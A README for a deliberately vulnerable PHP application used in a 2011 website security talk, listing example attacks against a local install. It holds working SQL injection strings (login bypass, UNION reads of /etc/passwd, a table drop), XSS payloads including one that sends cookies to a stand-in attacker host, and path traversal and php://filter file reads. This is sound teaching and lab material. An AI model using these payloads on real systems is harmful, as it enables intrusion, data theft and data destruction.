Credit goes to @jadz
This sample code was used for the SydPHP February 2011 talk on website security.
Props go out to @sydphp for hosting the talk and letting us talk. And my partner in crime @CerealBoy.
This code has been developed in such a way that it is vulnerable to the most basic and common website security exploits. It's meant to contain all the bad practices.
SQL Injection / XSS / Session Hijacking are all available through this codebase.
Note: Some of these might not work if your database user doesn't have sufficient privileges.
- Load the db.sql file to your database.
- Change the consts.php file to contain the username and password of database user.
- Load your site.
http://localhost/?username=jared'%20or%20'1'='1 http://localhost/?username=jared'%20or%20''=' http://localhost/index.php?id=1%20or%201=1 http://localhost/?id=1;drop%20table%20invoices -- doesn't work because mysql_query stacked query support -- but will work with other dbs http://localhost/index.php?username='%20UNION%20SELECT%201,1,1,1,LOAD_FILE('/etc/passwd'),'1 http://localhost/index.php?username='%20UNION%20SELECT%201,2,3,4,5,'hello%20world
Bypass Login:
Password: foo' or '1'='1
http://localhost/index.php?username=jared%3Cscript%3Ealert('Hi%20there!')%3C/script%3E http://localhost/template?load=php://filter/convert.base64-encode/resource=loadme
On the 'Send message' page:
Hey just wanted to say that you guys rock!
<script>
new Image().src="http://somereallybadsite.tld/?c="+encodeURI(document.cookie);
</script>
http://localhost/template.php?load=../../../../etc/passwd%00